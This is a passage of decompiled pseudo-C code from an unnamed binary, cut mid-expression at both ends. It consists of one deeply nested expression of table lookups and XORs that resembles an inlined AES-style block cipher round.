^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t198 & 0x000000ff) * 4) ^  *(_t175 + 0x10)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + (( *(0x409cd8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t198 & 0x000000ff) * 4) ^  *(_t175 + 0x10)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + (( *(0x409cd8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t189 & 0x000000ff) * 4) ^  *(_t175 + 8)) >> 0x18) * 4) ^  *(0x40a4d8 + (_t101 & 0x000000ff) * 4) ^  *(_t175 + 0xc)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + (( *(0x409cd8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4098d8 + ((_t87 ^  *_t175) >> 0x18) * 4) ^  *(0x40a4d8 + (_t92 & 0x000000ff) * 4) ^  *(_t175 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + (( *(0x409cd8 + ((_t87 ^  *_t175) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x40a0d8 + ((_t87 ^  *_t175) >> 0x00000008 & 0x000000ff) * 4) 